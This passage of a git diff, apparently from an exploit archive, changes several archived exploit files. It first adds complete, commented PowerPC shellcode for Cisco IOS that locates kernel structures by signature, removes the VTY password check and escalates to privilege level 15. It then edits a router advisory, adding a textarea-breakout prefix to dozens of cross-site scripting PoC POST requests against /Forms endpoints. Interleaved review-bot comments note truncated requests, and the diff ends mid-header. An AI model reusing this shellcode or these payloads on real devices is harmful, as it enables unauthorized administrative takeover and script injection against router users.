search signature -38 e7 01 94 addi r7,r7,404 -38 e7 fe 70 addi r7,r7,-400 -7c c4 38 6e l2: lwzux r6,r4,r7 -7c 06 28 40 cmplw r6,r5 # is address contents equal to signature -40 82 ff f8 bne 64 # no, keep searching -38 84 01 a8 addi r4,r4,424 # yes, found "sig_vty" -38 84 fe 70 addi r4,r4,-400 -7c e7 3a 78 xor r7,r7,r7 -7c a4 38 2e lwzx r5,r4,r7 # get two MSBs -38 a5 ff ff addi r5,r5,-1 -7d 08 42 78 xor r8,r8,r8 -39 08 01 a0 addi r8,r8,416 -39 08 fe 70 addi r8,r8,-400 -7c a5 40 30 slw r5,r5,r8 # shift MSBs into the right place (XXXX0000) -38 84 01 94 addi r4,r4,404 -38 84 fe 70 addi r4,r4,-400 -7c c4 38 2e lwzx r6,r4,r7 # get two LSBs -7c c6 40 30 slw r6,r6,r8 -7c c6 44 30 srw r6,r6,r8 # shift LSBs to clear the MSBs (0000YYYY) -7c a5 32 14 add r5,r5,r6 # add the two together (XXXXYYYY) -38 a5 01 08 addi r5,r5,264 # move to the 66th element of the -array (VTY 0 - see IOS "systat" command) -7d 05 38 2e lwzx r8,r5,r7 # r8 = vty_info -90 e8 01 74 stw r7,372(r8) # Remove the requirement to enter a password -38 e7 ff ff addi r7,r7,-1 -39 08 09 1a addi r8,r8,2330 -90 e8 04 ca stw r7,1226(r8) # privilege escalate to level 15 -7c e3 3b 78 mr r3,r7 -7d 49 03 a6 mtctr r10 -4e 80 04 20 bctr # terminate "this process" - +# Version-independent IOS shellcode, Andy Davis 2008 +# +# No hard-coded IOS addresses required +# +# The technique uses 4-byte signatures near references to the +# required addresses within the IOS "text" memory region. +# The addresses are then recovered from memory and used within the +# shellcode. +# +# This is beta 1 - this code can be highly optimised I'm sure, +# for example, the search routine could be reused and the number +# of registers cleared could be reduced - but it works :-) +# +# As this is the first iteration of this shellcode, I'm not making any +# claims as to exactly how portable it is - it has been tested on a +# number of IOS images and therefore, the concept has been demonstrated. 
+# +# Various simple techniques have been used to ensure that there are +# no nulls in the shellcode + + +.equ sig_vty, 0x7F60B910 # signature for vty_info +.equ sig_kill, 0x639C8889 # signature for terminate() +.equ start, 0x80018001 # start of the search + + +3c 80 80 02 lis r4,-32766 +38 84 80 01 addi r4,r4,-32767 # the start address for the search +3c a0 63 9d lis r5,25501 +38 a5 88 89 addi r5,r5,-30583 # the "sig_kill" search signature +38 e7 01 94 addi r7,r7,404 # add 4 without introducing nulls +(technique used throughout the shellcode) +38 e7 fe 70 addi r7,r7,-400 +7c c4 38 6e l1: lwzux r6,r4,r7 +7c 06 28 40 cmplw r6,r5 # is address contents equal to signature +40 82 ff f8 bne 18 # no, keep searching +7c a5 2a 78 xor r5,r5,r5 # yes, found "sig_kill" +38 84 01 e8 addi r4,r4,488 +38 84 fe 70 addi r4,r4,-400 +7c c4 28 2e lwzx r6,r4,r5 +38 a5 01 98 addi r5,r5,408 +38 a5 fe 70 addi r5,r5,-400 +7c c6 28 30 slw r6,r6,r5 +7c c6 2c 30 srw r6,r6,r5 +38 c6 ff ff addi r6,r6,-1 # r6 now contains the offset of +terminate() from here +7c 84 32 14 add r4,r4,r6 # add offset to current address +7c 8a 23 78 mr r10,r4 # address of terminate() saved into r10 +7c e7 3a 78 xor r7,r7,r7 +3c a0 7f 61 lis r5,32609 +38 a5 b9 10 addi r5,r5,-18160 # the "sig_vty" search signature +38 e7 01 94 addi r7,r7,404 +38 e7 fe 70 addi r7,r7,-400 +7c c4 38 6e l2: lwzux r6,r4,r7 +7c 06 28 40 cmplw r6,r5 # is address contents equal to signature +40 82 ff f8 bne 64 # no, keep searching +38 84 01 a8 addi r4,r4,424 # yes, found "sig_vty" +38 84 fe 70 addi r4,r4,-400 +7c e7 3a 78 xor r7,r7,r7 +7c a4 38 2e lwzx r5,r4,r7 # get two MSBs +38 a5 ff ff addi r5,r5,-1 +7d 08 42 78 xor r8,r8,r8 +39 08 01 a0 addi r8,r8,416 +39 08 fe 70 addi r8,r8,-400 +7c a5 40 30 slw r5,r5,r8 # shift MSBs into the right place (XXXX0000) +38 84 01 94 addi r4,r4,404 +38 84 fe 70 addi r4,r4,-400 +7c c4 38 2e lwzx r6,r4,r7 # get two LSBs +7c c6 40 30 slw r6,r6,r8 +7c c6 44 30 srw r6,r6,r8 # shift LSBs to clear the MSBs (0000YYYY) 
+7c a5 32 14 add r5,r5,r6 # add the two together (XXXXYYYY) +38 a5 01 08 addi r5,r5,264 # move to the 66th element of the +array (VTY 0 - see IOS "systat" command) +7d 05 38 2e lwzx r8,r5,r7 # r8 = vty_info +90 e8 01 74 stw r7,372(r8) # Remove the requirement to enter a password +38 e7 ff ff addi r7,r7,-1 +39 08 09 1a addi r8,r8,2330 +90 e8 04 ca stw r7,1226(r8) # privilege escalate to level 15 +7c e3 3b 78 mr r3,r7 +7d 49 03 a6 mtctr r10 +4e 80 04 20 bctr # terminate "this process" + # milw0rm.com [2008-08-21] \ No newline at end of file diff --git a/platforms/hardware/webapps/10276.txt b/platforms/hardware/webapps/10276.txt index d34bdf575..a1568e376 100755 --- a/platforms/hardware/webapps/10276.txt +++ b/platforms/hardware/webapps/10276.txt @@ -115,9 +115,9 @@ The POST variable BackButton has been set to >">alert(416215520 /Forms/error_1 Details -The POST variable BackButton has been set to alert(416225520282)%3B . +The POST variable BackButton has been set to </textarea>alert(416225520282)%3B . -BackButton=alert(416225520282)%3B +BackButton=</textarea>alert(416225520282)%3B ################################################################################################################################## @@ -199,9 +199,9 @@ wzConnFlag=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28401565272624%29%3B%22% /Forms/fresh_pppoe_1 Details -The POST variable wzConnFlag has been set to alert(401515272624)%3B . +The POST variable wzConnFlag has been set to </textarea>alert(401515272624)%3B . -wzConnFlag=alert(401515272624)%3B +wzConnFlag=</textarea>alert(401515272624)%3B ################################################################################################################################## 
@@ -274,9 +274,9 @@ diag_pppindex_argen=email@somealert(407145360657)%3Bdo /Forms/rpDiag_argen_1 Details -The POST variable diag_pppindex_argen has been set to alert(407115360657)%3B . +The POST variable diag_pppindex_argen has been set to </textarea>alert(407115360657)%3B . -diag_pppindex_argen=alert(407115360657)%3B&DiagArgenTest=Test&DiagStartFlag=0 +diag_pppindex_argen=</textarea>alert(407115360657)%3B&DiagArgenTest=Test&DiagStartFlag=0 ################################################################################################################################## @@ -369,9 +369,9 @@ diag_pppindex_argen=0&DiagArgenTest=Test&DiagStartFlag= . +The POST variable DiagStartFlag has been set to </textarea>alert(407215360661)%3B . -diag_pppindex_argen=0&DiagArgenTest=Test&DiagStartFlag=aler +diag_pppindex_argen=0&DiagArgenTest=Test&DiagStartFlag=</textarea>aler ################################################################################################################################## @@ -401,9 +401,9 @@ wzdmz_active=alert(414945497855)%3B&wzdmzHostI /Forms/rpNATdmz_argen_1 Details -The POST variable wzdmz_active has been set to alert(414935497855)%3B . +The POST variable wzdmz_active has been set to </textarea>alert(414935497855)%3B . -wzdmz_active=alert(414935497855)%3B&wzdmzHostIP=0%2E0%2E0%2E0&NATDMZApply=Aceptar +wzdmz_active=</textarea>alert(414935497855)%3B&wzdmzHostIP=0%2E0%2E0%2E0&NATDMZApply=Aceptar ################################################################################################################################## 
@@ -473,9 +473,9 @@ wzdmz_active=>'>alert(414915497855)%3B&wzdmzHostIP=0%2 /Forms/rpNATdmz_argen_1 Details -The POST variable wzdmzHostIP has been set to alert(415035497857)%3B . +The POST variable wzdmzHostIP has been set to </textarea>alert(415035497857)%3B . -wzdmz_active=1&wzdmzHostIP=alert(415035497857)%3B&NATDMZApply=Aceptar +wzdmz_active=1&wzdmzHostIP=</textarea>alert(415035497857)%3B&NATDMZApply=Aceptar ################################################################################################################################## @@ -553,9 +553,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzV /Forms/rpNATvirsvr_argen_1 Details -The POST variable wzVIRTUALSVR_endPort has been set to alert(409405385265)%3B . +The POST variable wzVIRTUALSVR_endPort has been set to </textarea>alert(409405385265)%3B . -wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=alert(409405385265)%3B&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=</textarea>alert(409405385265)%3B&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## 
@@ -655,9 +655,9 @@ wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRT /Forms/rpNATvirsvr_argen_1 Details -The POST variable wzVIRTUALSVR_endPort has been set to alert(408805384923)%3B . +The POST variable wzVIRTUALSVR_endPort has been set to </textarea>alert(408805384923)%3B . -wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=alert(408805384923)%3B&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=</textarea>alert(408805384923)%3B&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## 
@@ -781,9 +781,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzV /Forms/rpNATvirsvr_argen_1 Details -The POST variable wzVIRTUALSVR_endPortLocal has been set to alert(409105385033)%3B . +The POST variable wzVIRTUALSVR_endPortLocal has been set to </textarea>alert(409105385033)%3B . -wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=alert(409105385033)%3B&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=</textarea>alert(409105385033)%3B&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## 
@@ -821,9 +821,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzV /Forms/rpNATvirsvr_argen_1 Details -The POST variable wzVIRTUALSVR_endPortLocal has been set to alert(409705385375)%3B . +The POST variable wzVIRTUALSVR_endPortLocal has been set to </textarea>alert(409705385375)%3B . -wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=alert(409705385375)%3B&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=</textarea>alert(409705385375)%3B&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## 
@@ -845,7 +845,7 @@ wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag= /Forms/rpNATvirsvr_argen_1 Details -The POST variable wzVIRTUALSVR_IndexFlag has been set to alert(408605384811)%3B .wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=alert(408605384811)%3B&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +The POST variable wzVIRTUALSVR_IndexFlag has been set to </textarea>alert(408605384811)%3B .wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=</textarea>alert(408605384811)%3B&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## 
@@ -944,9 +944,9 @@ wzVIRTUALSVR_IndexFlag=>'>alert(409185385252)%3B&wzVIR /Forms/rpNATvirsvr_argen_1 Details -The POST variable wzVIRTUALSVR_IndexFlag has been set to alert(409205385252)%3B . +The POST variable wzVIRTUALSVR_IndexFlag has been set to </textarea>alert(409205385252)%3B . -wzVIRTUALSVR_IndexFlag=alert(409205385252)%3B&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_IndexFlag=</textarea>alert(409205385252)%3B&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## 
@@ -1072,9 +1072,9 @@ wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRT /Forms/rpNATvirsvr_argen_1 Details -The POST variable wzVIRTUALSVR_localIP has been set to alert(408905384923)%3B . +The POST variable wzVIRTUALSVR_localIP has been set to </textarea>alert(408905384923)%3B . -wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=alert(408905384923)%3B&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=</textarea>alert(408905384923)%3B&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## 
@@ -1120,9 +1120,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzV /Forms/rpNATvirsvr_argen_1 Details -The POST variable wzVIRTUALSVR_localIP has been set to alert(409505385265)%3B . +The POST variable wzVIRTUALSVR_localIP has been set to </textarea>alert(409505385265)%3B . -wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=alert(409505385265)%3B&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=</textarea>alert(409505385265)%3B&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## @@ -1190,9 +1190,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=-->alert(409305385263)%3B . +The POST variable wzVIRTUALSVR_startPort has been set to </textarea>alert(409305385263)%3B . -wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=alert(409305385263)%3B&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=</textarea>alert(409305385263)%3B&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## 
@@ -1206,9 +1206,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=alert(408705384921)%3B . +The POST variable wzVIRTUALSVR_startPort has been set to </textarea>alert(408705384921)%3B . -wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=alert(408705384921)%3B&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=</textarea>alert(408705384921)%3B&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## 
@@ -1278,9 +1278,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzV /Forms/rpNATvirsvr_argen_1 Details -The POST variable wzVIRTUALSVR_startPortLocal has been set to alert(409605385375)%3B . +The POST variable wzVIRTUALSVR_startPortLocal has been set to </textarea>alert(409605385375)%3B . -wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=alert(409605385375)%3B&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=</textarea>alert(409605385375)%3B&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## 
@@ -1358,9 +1358,9 @@ wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRT /Forms/rpNATvirsvr_argen_1 Details -The POST variable wzVIRTUALSVR_startPortLocal has been set to alert(409005385033)%3B . +The POST variable wzVIRTUALSVR_startPortLocal has been set to </textarea>alert(409005385033)%3B . -wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=alert(409005385033)%3B&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_index=111-222-1933email@address.tst&wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_App_idx=111-222-1933email@address.tst&wzVSProtocolIndex=111-222-1933email@address.tst&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=0&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=</textarea>alert(409005385033)%3B&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## @@ -1486,9 +1486,9 @@ Connect_DialHidden=0&Connect_DialFlag=>'>alert(402485284507)%3B /Forms/rpStatus_argen_1 Details -The POST variable Connect_DialFlag has been set to alert(402505284507)%3B . +The POST variable Connect_DialFlag has been set to </textarea>alert(402505284507)%3B . -Connect_DialHidden=0&Connect_DialFlag=alert(402505284507)%3B&Connect_Flag=0 +Connect_DialHidden=0&Connect_DialFlag=</textarea>alert(402505284507)%3B&Connect_Flag=0 ################################################################################################################################## 
@@ -1526,9 +1526,9 @@ Connect_DialHidden=email@somealert(402435284505)%3Bdom /Forms/rpStatus_argen_1 Details -The POST variable Connect_DialHidden has been set to alert(402405284505)%3B . +The POST variable Connect_DialHidden has been set to </textarea>alert(402405284505)%3B . -Connect_DialHidden=alert(402405284505)%3B&Connect_ +Connect_DialHidden=</textarea>alert(402405284505)%3B&Connect_ ################################################################################################################################## @@ -1566,9 +1566,9 @@ Connect_DialHidden=>'>alert(402385284505)%3B&Connect_D /Forms/rpStatus_argen_1 Details -The POST variable Connect_Flag has been set to alert(402605284509)%3B . +The POST variable Connect_Flag has been set to </textarea>alert(402605284509)%3B . -Connect_DialHidden=0&Connect_DialFlag=0&Connect_Flag=alert(402605284509)%3B +Connect_DialHidden=0&Connect_DialFlag=0&Connect_Flag=</textarea>alert(402605284509)%3B ################################################################################################################################## @@ -1756,9 +1756,9 @@ The POST variable Telephone_select has been set to >'>alert(404 /Forms/rpwizard_1 Details -The POST variable Telephone_select has been set to alert(404165310549)%3B . +The POST variable Telephone_select has been set to </textarea>alert(404165310549)%3B . -Telephone_select=alert(404165310549)%3B&wzArgentinaNext=Continuar&wzFirstFlag=0 +Telephone_select=</textarea>alert(404165310549)%3B&wzArgentinaNext=Continuar&wzFirstFlag=0 ################################################################################################################################## 
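Review bot: The request body on both sides of the @@ -1526 hunk stops at `&Connect_`, so the reproduction step for Connect_DialHidden is incomplete; the neighbouring rpStatus_argen_1 hunks send `Connect_DialHidden=...&Connect_DialFlag=0&Connect_Flag=0`. The commit only prefixes `</textarea>` to the value and does not restore the missing tail. This may be truncation in the archived text rather than in the original submission; confirm against the source and complete the line, e.g. `Connect_DialHidden=</textarea>alert(402405284505)%3B&Connect_DialFlag=0&Connect_Flag=0`.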
@@ -1816,7 +1816,7 @@ Telephone_select=email@somealert(404195310549)%3Bdomai /Forms/rpwizard_1 Details -The POST variable Telephone_select has been set to alert(404365310550)%3B .Telephone_select=alert(404365310550)%3B&Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=0 +The POST variable Telephone_select has been set to </textarea>alert(404365310550)%3B .Telephone_select=</textarea>alert(404365310550)%3B&Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=0 ################################################################################################################################## @@ -1846,9 +1846,9 @@ Telephone_select=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28404215310549%29% /Forms/rpwizard_1 Details -The POST variable Telephone_select has been set to alert(404465310552)%3B . +The POST variable Telephone_select has been set to </textarea>alert(404465310552)%3B . -Telephone_select=0&Telephone_select=alert(404465310552)%3B&wzArgentinaNext=Continuar&wzFirstFlag=0 +Telephone_select=0&Telephone_select=</textarea>alert(404465310552)%3B&wzArgentinaNext=Continuar&wzFirstFlag=0 ################################################################################################################################## @@ -1878,9 +1878,9 @@ Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag= . +The POST variable wzFirstFlag has been set to </textarea>alert(404565310554)%3B . -Telephone_select=0&Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag= +Telephone_select=0&Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=</textarea> ################################################################################################################################## 
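Review bot: In the @@ -1878 hunk the Details line says wzFirstFlag was set to `</textarea>alert(404565310554)%3B`, but the request body on the new side ends at `wzFirstFlag=</textarea>` with no alert call, so the documented payload and the replayable request disagree. The old side is likewise cut at `wzFirstFlag=`, so the commit carries the truncation forward rather than introducing it. This may be text mangling in the archive; if not, the body should end `...wzArgentinaNext=Continuar&wzFirstFlag=</textarea>alert(404565310554)%3B` to match the Details line and the sibling @@ -1958 hunk.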
@@ -1958,9 +1958,9 @@ Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=>'>ale /Forms/rpwizard_1 Details -The POST variable wzFirstFlag has been set to alert(404265310550)%3B . +The POST variable wzFirstFlag has been set to </textarea>alert(404265310550)%3B . -Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=alert(404265310550)%3B +Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=</textarea>alert(404265310550)%3B ################################################################################################################################## @@ -2014,9 +2014,9 @@ wzArgen_UserName=usernameincleartexthere%40arnet-for-apb&wzArgen_Password=passwo /Forms/rpwizPppoe_1 Details -The POST variable wzConnectFlag has been set to alert(414035486122)%3B . +The POST variable wzConnectFlag has been set to </textarea>alert(414035486122)%3B . -wzArgen_UserName=usernameincleartexthere%40arnet-for-apb&wzArgen_Password=passwordincleartexthere&wzArgentinaConnect=Conectar&wzArgentinaDisConnect=Desconectar&wzConnectFlag=alert(414035486122)%3B +wzArgen_UserName=usernameincleartexthere%40arnet-for-apb&wzArgen_Password=passwordincleartexthere&wzArgentinaConnect=Conectar&wzArgentinaDisConnect=Desconectar&wzConnectFlag=</textarea>alert(414035486122)%3B ################################################################################################################################## diff --git a/platforms/hardware/webapps/10347.txt b/platforms/hardware/webapps/10347.txt index b5f6853dc..7320e4e30 100755 --- a/platforms/hardware/webapps/10347.txt +++ b/platforms/hardware/webapps/10347.txt @@ -1,4 +1,3 @@ - PenTest Information: ==================== GESEC Team (~remove) discover multiple Input Validation Vulnerabilities on Barracuda IM Firewall. diff --git a/platforms/hp-ux/dos/195.sh b/platforms/hp-ux/dos/195.sh index 9f272b5e5..6a8f99342 100755 --- a/platforms/hp-ux/dos/195.sh +++ b/platforms/hp-ux/dos/195.sh 
